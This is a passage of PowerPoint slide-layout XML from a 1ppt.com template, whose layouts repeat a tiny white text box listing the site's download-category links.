              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout87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87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87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87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88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88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88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88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88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88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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout88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88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88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88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8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89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89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89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89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89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89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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout89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89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89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89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90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90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90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90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90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90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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
